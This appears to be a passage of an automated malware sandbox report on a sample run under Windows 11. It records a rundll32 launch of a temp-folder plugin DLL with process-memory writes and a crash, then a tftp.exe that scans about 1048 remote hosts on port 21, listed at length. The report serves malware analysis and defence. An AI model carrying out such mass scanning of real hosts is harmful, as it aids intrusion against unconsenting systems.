2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

90s

Max time network

99s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\inetc.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5104 wrote to memory of 5036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5104 wrote to memory of 5036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5104 wrote to memory of 5036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\inetc.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\inetc.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5036 -ip 5036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 480

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\tftp.exe"

Signatures

Contacts a large (1048) amount of remote hosts

discovery

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\tftp.exe"

Network

Country Destination Domain Proto
US 16.103.89.0:21 tcp
US 26.164.1.0:21 tcp
PK 39.48.120.0:21 tcp
CN 183.211.240.0:21 tcp
US 9.203.58.0:21 tcp
SA 62.120.46.0:21 tcp
US 168.233.121.0:21 tcp
NL 128.204.207.0:21 tcp
US 20.183.94.0:21 tcp
US 26.131.197.0:21 tcp
US 173.67.238.0:21 tcp
KR 1.99.108.0:21 tcp
TH 183.89.219.0:21 tcp
PL 81.168.215.0:21 tcp
JP 183.79.166.0:21 tcp
KR 27.1.35.0:21 tcp
GB 25.169.157.0:21 tcp
US 108.97.152.0:21 tcp
ID 202.73.122.0:21 tcp
US 131.119.149.0:21 tcp
US 216.136.71.0:21 tcp
N/A 141.229.94.0:21 tcp
US 67.149.146.0:21 tcp
US 67.181.1.0:21 tcp
JP 60.97.185.0:21 tcp
US 138.8.163.0:21 tcp
US 137.37.190.0:21 tcp
US 107.98.182.0:21 tcp
NL 145.120.163.0:21 tcp
JP 18.183.179.0:21 tcp
IN 223.228.213.0:21 tcp
US 172.84.127.0:21 tcp
IN 58.2.172.0:21 tcp
TW 36.238.31.0:21 tcp
US 167.31.99.0:21 tcp
US 56.183.16.0:21 tcp
GB 25.131.14.0:21 tcp
ID 203.123.229.0:21 tcp
NL 20.61.55.0:21 tcp
US 99.182.245.0:21 tcp
KR 125.57.186.0:21 tcp
AR 190.191.84.0:21 tcp
US 137.254.236.0:21 tcp
HK 20.205.18.0:21 tcp
CA 142.127.250.0:21 tcp
LV 92.63.84.0:21 tcp
KR 101.202.65.0:21 tcp
US 161.6.140.0:21 tcp
US 208.205.115.0:21 tcp
JP 219.187.58.0:21 tcp
MA 45.219.60.0:21 tcp
US 162.203.120.0:21 tcp
US 75.232.117.0:21 tcp
KR 175.223.202.0:21 tcp
CN 14.223.24.0:21 tcp
US 4.110.74.0:21 tcp
DE 141.200.52.0:21 tcp
US 71.131.21.0:21 tcp
MX 177.225.9.0:21 tcp
PL 78.9.11.0:21 tcp
US 63.91.48.0:21 tcp
KR 13.125.238.0:21 tcp
GR 78.87.58.0:21 tcp
US 3.193.24.0:21 tcp
EG 105.81.129.0:21 tcp
SA 5.245.116.0:21 tcp
US 184.219.151.0:21 tcp
US 107.229.198.0:21 tcp
US 205.110.80.0:21 tcp
US 135.4.120.0:21 tcp
CN 58.44.105.0:21 tcp
GB 155.198.109.0:21 tcp
DE 217.94.191.0:21 tcp
US 67.54.49.0:21 tcp
MW 137.115.236.0:21 tcp
US 50.138.118.0:21 tcp
US 129.117.65.0:21 tcp
DE 53.20.207.0:21 tcp
US 159.203.124.0:21 tcp
JP 221.53.233.0:21 tcp
JP 165.14.117.0:21 tcp
US 73.179.245.0:21 tcp
GB 81.87.3.0:21 tcp
US 216.162.56.0:21 tcp
DE 62.53.231.0:21 tcp
US 18.92.86.1:21 tcp
IE 4.210.50.1:21 tcp
US 209.219.241.1:21 tcp
PY 208.127.151.1:21 tcp
CA 153.87.244.1:21 tcp
TW 218.210.52.1:21 tcp
CN 125.84.47.1:21 tcp
US 100.52.123.1:21 tcp
IT 94.32.236.1:21 tcp
AU 120.17.184.1:21 tcp
US 40.192.68.1:21 tcp
US 130.196.225.1:21 tcp
DE 91.16.79.1:21 tcp
EG 197.42.237.1:21 tcp
RU 2.60.183.1:21 tcp
US 198.1.133.1:21 tcp
JP 153.131.166.1:21 tcp
JP 220.156.144.1:21 tcp
DE 3.120.94.1:21 tcp
US 160.91.104.1:21 tcp
US 33.26.7.1:21 tcp
VN 14.245.218.1:21 tcp
CN 39.80.81.1:21 tcp
CA 38.61.247.1:21 tcp
JP 59.132.229.1:21 tcp
PL 195.205.132.1:21 tcp
US 147.155.46.1:21 tcp
FR 83.200.204.1:21 tcp
JP 117.55.85.1:21 tcp
SE 80.89.174.1:21 tcp
US 65.57.167.1:21 tcp
US 214.236.231.1:21 tcp
US 67.102.237.1:21 tcp
FR 89.2.48.1:21 tcp
KR 123.251.14.1:21 tcp
US 214.202.89.1:21 tcp
US 155.174.249.1:21 tcp
US 169.204.207.1:21 tcp
EG 102.60.214.1:21 tcp
US 40.110.83.1:21 tcp
US 136.220.82.1:21 tcp
PL 31.63.180.1:21 tcp
KR 211.234.182.1:21 tcp
MX 170.70.168.1:21 tcp
US 99.94.206.1:21 tcp
US 129.229.212.1:21 tcp
US 204.208.252.1:21 tcp
US 64.99.246.1:21 tcp
ZA 154.16.84.1:21 tcp
US 208.244.216.1:21 tcp
UA 178.133.229.1:21 tcp
CN 14.210.70.1:21 tcp
GB 172.94.74.1:21 tcp
US 32.143.206.1:21 tcp
US 134.121.106.1:21 tcp
US 23.123.130.1:21 tcp
US 131.241.71.1:21 tcp
US 205.63.90.1:21 tcp
US 12.76.4.1:21 tcp
US 18.59.176.1:21 tcp
DE 178.9.143.1:21 tcp
US 206.151.102.1:21 tcp
GB 159.101.185.1:21 tcp
AU 128.250.46.1:21 tcp
US 173.56.189.1:21 tcp
BR 191.23.82.1:21 tcp
CN 202.118.28.1:21 tcp
CN 111.144.14.1:21 tcp
US 165.156.234.1:21 tcp
US 108.111.5.1:21 tcp
GB 45.8.187.1:21 tcp
CN 183.189.165.1:21 tcp
US 16.199.95.1:21 tcp
US 214.107.104.1:21 tcp
US 97.233.243.1:21 tcp
US 21.178.176.1:21 tcp
US 72.243.18.1:21 tcp
US 209.215.16.1:21 tcp
US 148.16.190.1:21 tcp
BR 170.247.66.1:21 tcp
TW 59.125.155.1:21 tcp
GB 51.55.103.1:21 tcp
US 55.155.170.1:21 tcp
BR 177.182.112.1:21 tcp
US 52.244.68.1:21 tcp
ID 120.167.20.2:21 tcp
FR 161.104.176.2:21 tcp
AU 101.118.99.2:21 tcp
US 172.159.55.2:21 tcp
GB 164.143.146.2:21 tcp
ZA 197.86.134.2:21 tcp
MX 189.180.133.2:21 tcp
CN 123.184.56.2:21 tcp
CH 77.58.22.2:21 tcp
CN 120.40.6.2:21 tcp
SE 164.9.155.2:21 tcp
US 24.153.81.2:21 tcp
CA 64.87.218.2:21 tcp
US 70.192.120.2:21 tcp
JP 49.107.86.2:21 tcp
JP 113.33.146.2:21 tcp
US 29.180.114.2:21 tcp
JP 163.208.163.2:21 tcp
SE 51.20.86.2:21 tcp
BR 179.213.245.2:21 tcp
US 128.244.239.2:21 tcp
US 97.50.74.2:21 tcp
US 198.197.203.2:21 tcp
US 15.25.146.2:21 tcp
GB 84.9.177.2:21 tcp
NZ 125.236.18.2:21 tcp
US 144.169.159.2:21 tcp
US 104.12.212.2:21 tcp
CN 115.215.57.2:21 tcp
MX 189.212.87.2:21 tcp
US 136.84.167.2:21 tcp
CN 115.100.110.2:21 tcp
IT 77.74.151.2:21 tcp
US 4.57.36.2:21 tcp
IT 88.45.232.2:21 tcp
US 75.100.215.2:21 tcp
JP 221.254.24.2:21 tcp
US 48.109.203.2:21 tcp
US 140.47.56.2:21 tcp
CN 183.216.180.2:21 tcp
US 149.80.68.2:21 tcp
KG 193.176.239.2:21 tcp
IT 78.215.91.2:21 tcp
CN 101.130.136.2:21 tcp
HK 58.153.61.2:21 tcp
US 100.202.57.2:21 tcp
LK 124.6.242.2:21 tcp
AU 120.159.163.2:21 tcp
CH 57.63.36.2:21 tcp
US 96.174.223.2:21 tcp
US 143.144.123.2:21 tcp
IN 123.255.249.2:21 tcp
IT 89.189.38.2:21 tcp
US 134.254.252.2:21 tcp
IS 88.149.91.2:21 tcp
ES 82.86.236.2:21 tcp
US 38.57.164.2:21 tcp
US 215.8.236.2:21 tcp
DE 31.225.68.2:21 tcp
US 69.57.102.2:21 tcp
AU 1.42.37.2:21 tcp
IN 117.231.142.2:21 tcp
CN 183.255.77.2:21 tcp
US 138.112.251.2:21 tcp
CH 143.180.196.2:21 tcp
CN 119.39.200.2:21 tcp
BH 77.69.225.2:21 tcp
US 206.142.119.2:21 tcp
ID 103.125.185.2:21 tcp
JP 133.153.168.2:21 tcp
US 148.34.63.2:21 tcp
KR 116.121.222.2:21 tcp
AU 54.79.173.2:21 tcp
CL 144.22.52.2:21 tcp
TW 111.70.49.2:21 tcp
US 168.245.134.2:21 tcp
JP 123.104.146.2:21 tcp
IL 192.115.29.2:21 tcp
CN 120.230.182.2:21 tcp
US 165.232.242.2:21 tcp
US 34.96.17.2:21 tcp
US 32.207.97.2:21 tcp
US 28.183.20.2:21 tcp
DE 217.251.74.2:21 tcp
CN 1.189.200.2:21 tcp
US 52.38.109.2:21 tcp
BR 191.217.178.2:21 tcp
IN 117.232.206.2:21 tcp
US 184.182.229.2:21 tcp
KR 58.72.78.2:21 tcp
N/A 127.39.89.2:21 tcp
JP 126.125.181.3:21 tcp
US 199.35.208.3:21 tcp
CA 68.147.116.3:21 tcp
US 131.81.89.3:21 tcp
CN 218.10.10.3:21 tcp
US 34.205.239.3:21 tcp
JP 220.42.227.3:21 tcp
VN 116.100.209.3:21 tcp
BR 200.172.153.3:21 tcp
US 29.211.38.3:21 tcp
NL 94.242.198.3:21 tcp
CN 119.117.208.3:21 tcp
CZ 62.84.149.3:21 tcp
US 88.110.120.3:21 tcp
MY 114.133.146.3:21 tcp
CN 1.81.138.3:21 tcp
GB 136.225.219.3:21 tcp
US 18.32.130.3:21 tcp
US 99.117.140.3:21 tcp
CZ 194.182.68.3:21 tcp
DE 51.176.166.3:21 tcp
SG 151.153.136.3:21 tcp
SE 212.37.29.3:21 tcp
BR 177.2.130.3:21 tcp
JP 60.136.114.3:21 tcp
DZ 154.241.110.3:21 tcp
US 70.8.34.3:21 tcp
TW 111.249.33.3:21 tcp
US 208.107.213.3:21 tcp
US 28.45.159.3:21 tcp
US 11.19.200.3:21 tcp
JP 49.97.176.3:21 tcp
CN 220.173.15.3:21 tcp
US 8.116.248.3:21 tcp
ES 79.146.111.3:21 tcp
RU 185.48.238.3:21 tcp
DE 217.93.12.3:21 tcp
AU 202.27.81.3:21 tcp
US 35.130.22.3:21 tcp
US 168.9.62.3:21 tcp
SE 212.247.0.3:21 tcp
UA 178.133.120.3:21 tcp
CN 14.197.69.3:21 tcp
US 66.198.71.3:21 tcp
US 96.24.29.3:21 tcp
US 98.156.38.3:21 tcp
ES 85.48.205.3:21 tcp
US 209.192.107.3:21 tcp
US 159.35.129.3:21 tcp
US 143.81.179.3:21 tcp
CL 179.4.143.3:21 tcp
UA 37.73.213.3:21 tcp
JP 126.53.17.3:21 tcp
AU 49.185.142.3:21 tcp
FI 194.215.19.3:21 tcp
US 4.8.71.3:21 tcp
US 19.34.229.3:21 tcp
KR 211.254.84.3:21 tcp
US 26.47.117.3:21 tcp
MX 200.34.156.3:21 tcp
GB 87.87.207.3:21 tcp
US 208.6.57.3:21 tcp
US 44.11.252.3:21 tcp
US 44.151.112.3:21 tcp
IN 14.102.6.3:21 tcp
DE 87.138.93.3:21 tcp
CN 117.114.1.3:21 tcp
GB 25.74.172.3:21 tcp
CN 112.99.31.3:21 tcp
US 33.75.25.3:21 tcp
JP 218.133.226.3:21 tcp
GB 51.251.176.3:21 tcp
CZ 91.106.244.3:21 tcp
AT 84.112.112.3:21 tcp
US 40.238.180.3:21 tcp
US 130.122.58.3:21 tcp
UA 128.124.200.3:21 tcp
US 23.27.136.3:21 tcp
US 215.14.232.3:21 tcp
JP 183.181.216.3:21 tcp
IN 59.91.162.3:21 tcp
US 75.238.232.3:21 tcp
DE 159.200.161.3:21 tcp
US 24.61.172.3:21 tcp
GB 146.42.192.3:21 tcp
US 35.87.45.3:21 tcp
US 199.70.40.3:21 tcp
US 8.8.8.8:53 3.136.27.23.in-addr.arpa udp
US 15.31.215.4:21 tcp
US 26.236.65.4:21 tcp
GB 158.234.189.4:21 tcp
US 68.213.189.4:21 tcp
PA 201.225.42.4:21 tcp
US 48.145.17.4:21 tcp
US 75.234.255.4:21 tcp
CN 223.221.63.4:21 tcp
US 99.163.146.4:21 tcp
US 152.229.120.4:21 tcp
ZA 41.4.156.4:21 tcp
NL 145.50.55.4:21 tcp
US 15.172.156.4:21 tcp
CA 147.253.112.4:21 tcp
US 69.100.228.4:21 tcp
BR 191.246.105.4:21 tcp
CN 113.114.136.4:21 tcp
US 143.211.166.4:21 tcp
DE 109.47.229.4:21 tcp
CN 36.192.3.4:21 tcp
US 146.130.21.4:21 tcp
US 40.86.120.4:21 tcp
US 147.176.233.4:21 tcp
KR 223.165.134.4:21 tcp
JP 60.131.40.4:21 tcp
IT 2.225.32.4:21 tcp
JP 126.255.153.4:21 tcp
US 16.84.39.4:21 tcp
CN 116.52.253.4:21 tcp
US 63.60.35.4:21 tcp
US 48.213.125.4:21 tcp
US 32.117.169.4:21 tcp
US 35.231.32.4:21 tcp
US 170.58.198.4:21 tcp
DE 53.231.81.4:21 tcp
CN 120.81.225.4:21 tcp
CN 113.55.208.4:21 tcp
US 208.120.182.4:21 tcp
US 73.149.179.4:21 tcp
CN 122.78.185.4:21 tcp
JP 60.192.74.4:21 tcp
DE 194.94.195.4:21 tcp
CN 39.159.120.4:21 tcp
CN 202.120.123.4:21 tcp
US 65.136.104.4:21 tcp
CN 114.68.24.4:21 tcp
ZA 41.146.143.4:21 tcp
N/A 127.251.127.4:21 tcp
CN 129.211.84.4:21 tcp
CN 106.8.45.4:21 tcp
US 130.91.76.4:21 tcp
US 96.213.50.4:21 tcp
IL 109.226.50.4:21 tcp
JP 121.1.192.4:21 tcp
UA 85.238.123.4:21 tcp
KR 115.93.193.4:21 tcp
US 205.109.99.4:21 tcp
US 107.143.218.4:21 tcp
US 129.221.133.4:21 tcp
SE 2.248.21.4:21 tcp
US 21.249.161.4:21 tcp
US 132.148.135.4:21 tcp
JP 58.146.68.4:21 tcp
BE 157.193.159.4:21 tcp
US 134.120.24.4:21 tcp
US 149.38.87.4:21 tcp
US 140.187.29.4:21 tcp
US 8.192.38.4:21 tcp
GB 213.104.74.4:21 tcp
US 97.105.101.4:21 tcp
US 152.86.247.4:21 tcp
VI 146.226.241.4:21 tcp
NO 144.181.46.4:21 tcp
KR 219.253.141.4:21 tcp
US 22.105.33.4:21 tcp
NO 46.230.137.4:21 tcp
US 21.156.189.4:21 tcp
JP 124.44.200.4:21 tcp
US 50.229.129.4:21 tcp
JP 133.171.127.4:21 tcp
US 161.61.125.4:21 tcp
CN 202.195.132.4:21 tcp
DE 141.25.34.5:21 tcp
IE 52.16.76.5:21 tcp
CO 181.205.251.5:21 tcp
US 56.8.205.5:21 tcp
US 136.234.35.5:21 tcp
CN 111.215.81.5:21 tcp
JP 219.185.140.5:21 tcp
BE 178.119.200.5:21 tcp
US 50.194.226.5:21 tcp
US 63.129.22.5:21 tcp
RU 87.225.57.5:21 tcp
US 67.96.25.5:21 tcp
BE 81.241.229.5:21 tcp
US 32.89.147.5:21 tcp
US 6.109.159.5:21 tcp
JP 36.240.74.5:21 tcp
AU 101.189.130.5:21 tcp
ZM 45.213.112.5:21 tcp
CN 129.204.17.5:21 tcp
US 148.194.105.5:21 tcp
CN 221.195.24.5:21 tcp
CN 125.36.85.5:21 tcp
US 137.148.14.5:21 tcp
US 13.0.55.5:21 tcp
CN 61.183.159.5:21 tcp
ES 193.146.100.5:21 tcp
N/A 172.29.9.5:21 tcp
US 76.184.61.5:21 tcp
US 214.27.187.5:21 tcp
US 64.237.39.5:21 tcp
NO 84.211.130.5:21 tcp
CN 124.93.249.5:21 tcp
US 75.1.29.5:21 tcp
HN 190.97.191.5:21 tcp
US 169.164.151.5:21 tcp
CH 130.60.35.5:21 tcp
US 98.40.146.5:21 tcp
US 199.232.248.5:21 tcp
US 161.247.1.5:21 tcp
US 151.210.92.5:21 tcp
US 150.202.216.5:21 tcp
DE 88.76.191.5:21 tcp
TW 103.222.250.5:21 tcp
US 216.119.136.5:21 tcp
DZ 197.202.81.5:21 tcp
MY 115.132.63.5:21 tcp
BR 200.129.160.5:21 tcp
US 24.194.192.5:21 tcp
VN 113.191.239.5:21 tcp
HK 218.253.32.5:21 tcp
SG 43.18.249.5:21 tcp
CN 101.231.123.5:21 tcp
US 71.233.180.5:21 tcp
CN 183.136.251.5:21 tcp
US 214.76.22.5:21 tcp
US 107.181.114.5:21 tcp
ID 114.125.242.5:21 tcp
RU 5.140.32.5:21 tcp
KR 175.246.114.5:21 tcp
GB 25.200.73.5:21 tcp
US 47.208.34.5:21 tcp
US 136.189.163.5:21 tcp
PL 77.115.91.5:21 tcp
N/A 100.76.130.5:21 tcp
KR 110.10.196.5:21 tcp
BR 169.57.210.5:21 tcp
AU 157.155.43.5:21 tcp
FR 91.200.133.5:21 tcp
JP 221.74.70.5:21 tcp
US 21.210.156.5:21 tcp
CN 117.26.63.5:21 tcp
HK 119.236.202.5:21 tcp
US 55.13.183.5:21 tcp
DE 93.237.71.5:21 tcp
US 155.124.172.5:21 tcp
NC 113.21.104.5:21 tcp
US 99.164.46.5:21 tcp
US 9.217.3.5:21 tcp
BG 92.247.56.5:21 tcp
US 207.78.60.5:21 tcp
US 44.121.179.5:21 tcp
AU 49.176.24.5:21 tcp
JP 219.8.174.5:21 tcp
US 128.150.121.5:21 tcp
US 136.179.21.6:21 tcp
FR 94.238.73.6:21 tcp
SA 142.247.182.6:21 tcp
KR 106.246.66.6:21 tcp
SD 102.143.166.6:21 tcp
US 45.40.156.6:21 tcp
US 13.96.97.6:21 tcp
US 144.153.176.6:21 tcp
HK 91.238.114.6:21 tcp
JP 165.241.212.6:21 tcp
US 199.47.78.6:21 tcp
US 100.202.163.6:21 tcp
GB 25.221.159.6:21 tcp
US 214.179.192.6:21 tcp
CN 171.215.251.6:21 tcp
US 151.102.255.6:21 tcp
GB 92.6.93.6:21 tcp
SE 217.215.228.6:21 tcp
PK 39.37.163.6:21 tcp
BR 32.109.16.6:21 tcp
US 65.119.12.6:21 tcp
AT 185.224.202.6:21 tcp
US 38.146.227.6:21 tcp
DE 62.245.149.6:21 tcp
JP 90.149.174.6:21 tcp
US 214.204.216.6:21 tcp
BR 189.110.110.6:21 tcp
TW 1.172.163.6:21 tcp
US 214.198.169.6:21 tcp
CA 209.153.254.6:21 tcp
CN 222.34.143.6:21 tcp
JP 219.215.179.6:21 tcp
US 22.241.110.6:21 tcp
CA 149.25.145.6:21 tcp
NL 77.60.153.6:21 tcp
US 50.211.123.6:21 tcp
US 146.189.169.6:21 tcp
US 17.27.218.6:21 tcp
US 69.86.9.6:21 tcp
US 128.182.189.6:21 tcp
IT 79.18.123.6:21 tcp
US 48.146.198.6:21 tcp
MG 197.215.195.6:21 tcp
NO 148.123.247.6:21 tcp
AU 146.221.176.6:21 tcp
US 205.4.195.6:21 tcp
US 21.44.179.6:21 tcp
IT 31.27.172.6:21 tcp
US 16.64.31.6:21 tcp
DE 77.176.17.6:21 tcp
GB 81.143.195.6:21 tcp
KR 58.122.19.6:21 tcp
KR 210.97.212.6:21 tcp
US 153.48.119.6:21 tcp
DE 141.27.179.6:21 tcp
CH 188.60.1.6:21 tcp
US 22.129.251.6:21 tcp
BE 84.195.189.6:21 tcp
CN 114.80.133.6:21 tcp
CN 183.185.218.6:21 tcp
BR 179.115.78.6:21 tcp
FR 109.18.53.6:21 tcp
CA 74.12.159.6:21 tcp
CN 121.8.130.6:21 tcp
FR 81.1.57.6:21 tcp
CH 57.32.238.6:21 tcp
JP 133.238.93.6:21 tcp
US 18.123.182.6:21 tcp
US 64.192.37.6:21 tcp
KR 49.254.251.6:21 tcp
IT 88.44.58.6:21 tcp
US 26.80.65.6:21 tcp
US 24.210.165.6:21 tcp
SE 13.63.65.6:21 tcp
US 22.76.125.6:21 tcp
GB 82.37.252.6:21 tcp
US 26.211.185.6:21 tcp
JP 221.189.183.6:21 tcp
US 131.6.40.6:21 tcp
US 26.109.78.6:21 tcp
US 11.148.161.6:21 tcp
ZA 197.70.251.6:21 tcp
TW 42.68.213.6:21 tcp
KR 211.221.198.6:21 tcp
GB 195.106.81.6:21 tcp
US 171.181.180.6:21 tcp
US 104.6.112.6:21 tcp
US 207.178.255.6:21 tcp
US 150.136.76.7:21 tcp
US 198.55.138.7:21 tcp
US 214.195.254.7:21 tcp
US 76.130.70.7:21 tcp
ID 180.251.18.7:21 tcp
FR 154.194.9.7:21 tcp
US 66.57.136.7:21 tcp
US 44.221.244.7:21 tcp
CN 183.24.117.7:21 tcp
JP 61.117.212.7:21 tcp
CN 210.37.205.7:21 tcp
KR 211.208.114.7:21 tcp
US 192.11.136.7:21 tcp
VN 27.70.50.7:21 tcp
CN 120.217.252.7:21 tcp
US 149.33.193.7:21 tcp
NL 194.194.229.7:21 tcp
US 168.162.46.7:21 tcp
US 173.254.221.7:21 tcp
IT 194.184.190.7:21 tcp
BR 191.194.99.7:21 tcp
US 131.60.143.7:21 tcp
ES 138.4.166.7:21 tcp
TW 113.21.176.7:21 tcp
TW 118.231.18.7:21 tcp
KR 121.174.9.7:21 tcp
US 4.198.244.7:21 tcp
US 40.225.189.7:21 tcp
US 97.1.192.7:21 tcp
N/A 127.24.153.7:21 tcp
SE 130.244.1.7:21 tcp
TN 197.1.189.7:21 tcp
CN 218.57.159.7:21 tcp
US 73.86.133.7:21 tcp
US 67.40.146.7:21 tcp
CH 138.191.219.7:21 tcp
US 63.8.68.7:21 tcp
AU 138.130.145.7:21 tcp
US 159.57.169.7:21 tcp
CH 212.117.202.7:21 tcp
JP 160.241.57.7:21 tcp
HK 54.46.128.7:21 tcp
NL 185.238.169.7:21 tcp
JP 124.109.202.7:21 tcp
TW 101.136.212.7:21 tcp
N/A 127.57.212.7:21 tcp
RO 92.80.45.7:21 tcp
AU 118.211.182.7:21 tcp
US 66.44.136.7:21 tcp
CN 223.8.192.7:21 tcp
BR 187.21.133.7:21 tcp
TR 88.231.3.7:21 tcp
CN 39.182.17.7:21 tcp
JP 220.6.110.7:21 tcp
US 35.129.42.7:21 tcp
US 57.172.208.7:21 tcp
SG 43.57.100.7:21 tcp
US 192.251.215.7:21 tcp
US 35.122.153.7:21 tcp
JP 222.14.143.7:21 tcp
US 30.145.163.7:21 tcp
US 174.200.182.7:21 tcp
BR 191.246.247.7:21 tcp
N/A 10.36.93.7:21 tcp
US 22.36.132.7:21 tcp
US 208.177.18.7:21 tcp
US 209.70.195.7:21 tcp
VN 14.254.200.7:21 tcp
ES 161.116.113.7:21 tcp
US 7.55.201.7:21 tcp
US 96.198.97.7:21 tcp
US 172.170.135.7:21 tcp
US 131.34.25.7:21 tcp
VN 103.14.155.7:21 tcp
US 13.144.206.7:21 tcp
FR 90.125.12.7:21 tcp
AU 203.63.71.7:21 tcp
US 161.31.17.7:21 tcp
JP 202.217.65.7:21 tcp
DE 145.55.101.7:21 tcp
ID 39.194.52.7:21 tcp
US 18.207.29.7:21 tcp
RU 5.129.249.7:21 tcp
CN 49.86.58.7:21 tcp
US 35.114.65.7:21 tcp
HK 23.234.5.8:21 tcp
US 205.38.109.8:21 tcp
TW 61.231.221.8:21 tcp
CA 99.215.151.8:21 tcp
IT 91.187.203.8:21 tcp
LA 183.182.120.8:21 tcp
CN 112.0.100.8:21 tcp
KR 211.194.255.8:21 tcp
NL 23.97.161.8:21 tcp
US 6.187.166.8:21 tcp
NL 83.82.137.8:21 tcp
JP 157.14.1.8:21 tcp
SG 43.55.107.8:21 tcp
NL 83.83.87.8:21 tcp
JP 220.96.179.8:21 tcp
DE 77.184.65.8:21 tcp
BR 187.11.94.8:21 tcp
JP 160.11.159.8:21 tcp
KR 219.254.254.8:21 tcp
US 74.178.68.8:21 tcp
CN 221.14.228.8:21 tcp
JP 221.112.123.8:21 tcp
US 40.47.198.8:21 tcp
US 11.158.176.8:21 tcp
US 138.138.255.8:21 tcp
KW 37.231.146.8:21 tcp
CN 218.6.210.8:21 tcp
CN 123.119.149.8:21 tcp
US 108.174.192.8:21 tcp
CN 119.96.19.8:21 tcp
JP 143.253.212.8:21 tcp
BR 200.206.43.8:21 tcp
US 67.189.136.8:21 tcp
RU 89.16.108.8:21 tcp
N/A 127.22.215.8:21 tcp
NL 145.24.169.8:21 tcp
US 16.13.190.8:21 tcp
DE 53.174.91.8:21 tcp
US 48.125.179.8:21 tcp
CA 50.64.10.8:21 tcp
US 135.59.141.8:21 tcp
US 170.149.212.8:21 tcp
US 149.11.218.8:21 tcp
GB 81.151.146.8:21 tcp
US 17.122.91.8:21 tcp
BR 177.107.85.8:21 tcp
US 161.21.100.8:21 tcp
CN 42.251.244.8:21 tcp
CN 110.96.110.8:21 tcp
AU 52.147.53.8:21 tcp
US 50.161.31.8:21 tcp
US 206.59.187.8:21 tcp
NL 188.205.61.8:21 tcp
KR 39.4.236.8:21 tcp
CN 222.215.247.8:21 tcp
US 37.18.180.8:21 tcp
US 72.63.146.8:21 tcp
US 70.132.140.8:21 tcp
US 168.102.81.8:21 tcp
US 76.168.212.8:21 tcp
IT 151.63.133.8:21 tcp
EG 217.52.58.8:21 tcp
US 52.145.100.8:21 tcp
MK 92.55.116.8:21 tcp
JP 133.115.221.8:21 tcp
HU 84.206.7.8:21 tcp
JP 125.12.44.8:21 tcp
SA 167.86.191.8:21 tcp
US 163.192.192.8:21 tcp
US 139.161.251.8:21 tcp
US 96.75.252.8:21 tcp
ES 95.122.172.8:21 tcp
US 207.27.221.8:21 tcp
AU 114.73.130.8:21 tcp
CN 113.200.171.8:21 tcp
DE 53.109.221.8:21 tcp
US 33.14.73.8:21 tcp
KR 222.100.46.8:21 tcp
NL 129.125.74.8:21 tcp
US 141.155.76.8:21 tcp
IT 85.46.89.8:21 tcp
CN 120.40.25.8:21 tcp
US 215.204.159.8:21 tcp
N/A 10.34.97.8:21 tcp
SG 43.78.193.8:21 tcp
US 22.208.185.8:21 tcp
IN 125.63.116.8:21 tcp
US 97.169.119.9:21 tcp
US 20.176.86.9:21 tcp
GB 46.208.44.9:21 tcp
DE 53.244.24.9:21 tcp
CH 147.86.73.9:21 tcp
US 32.210.50.9:21 tcp
US 166.59.124.9:21 tcp
IE 92.235.7.9:21 tcp
US 160.254.21.9:21 tcp
CN 39.174.87.9:21 tcp
SA 37.241.131.9:21 tcp
US 173.22.254.9:21 tcp
US 57.103.154.9:21 tcp
US 16.121.141.9:21 tcp
SG 8.162.153.9:21 tcp
US 40.50.21.9:21 tcp
PR 72.50.37.9:21 tcp
US 38.236.29.9:21 tcp
PE 186.161.61.9:21 tcp
US 18.55.89.9:21 tcp
AO 41.63.182.9:21 tcp
IR 172.80.185.9:21 tcp
DE 74.1.70.9:21 tcp
N/A 10.125.149.9:21 tcp
US 170.125.110.9:21 tcp
US 56.148.123.9:21 tcp
US 214.23.226.9:21 tcp
FR 82.238.221.9:21 tcp
FR 83.112.156.9:21 tcp
FR 138.231.31.9:21 tcp
CN 58.60.8.9:21 tcp
GB 195.137.53.9:21 tcp
QA 34.18.179.9:21 tcp
VN 14.164.123.9:21 tcp
NL 156.83.241.9:21 tcp
US 206.142.133.9:21 tcp
US 76.220.169.9:21 tcp
US 149.2.147.9:21 tcp
US 47.253.177.9:21 tcp
US 146.132.140.9:21 tcp
US 6.162.96.9:21 tcp
ZA 102.220.114.9:21 tcp
US 23.155.123.9:21 tcp
US 4.99.123.9:21 tcp
JP 61.44.163.9:21 tcp
GB 90.223.29.9:21 tcp
CN 27.195.135.9:21 tcp
US 52.249.245.9:21 tcp
KR 1.218.89.9:21 tcp
SG 54.151.185.9:21 tcp
US 134.40.228.9:21 tcp
TW 210.63.166.9:21 tcp
EG 105.47.24.9:21 tcp
US 206.210.18.9:21 tcp
IL 176.229.224.9:21 tcp
US 146.114.10.9:21 tcp
FI 213.141.124.9:21 tcp
CN 1.3.163.9:21 tcp
US 74.55.210.9:21 tcp
LV 87.99.74.9:21 tcp
US 147.106.5.9:21 tcp
PL 83.218.102.9:21 tcp
JP 210.236.195.9:21 tcp
US 104.197.27.9:21 tcp
DZ 154.240.53.9:21 tcp
GB 25.26.121.9:21 tcp
FR 89.86.3.9:21 tcp
EG 156.200.123.9:21 tcp
US 21.26.40.9:21 tcp
US 72.133.109.9:21 tcp
EG 196.153.166.9:21 tcp
ZA 164.151.225.9:21 tcp
US 136.10.159.9:21 tcp
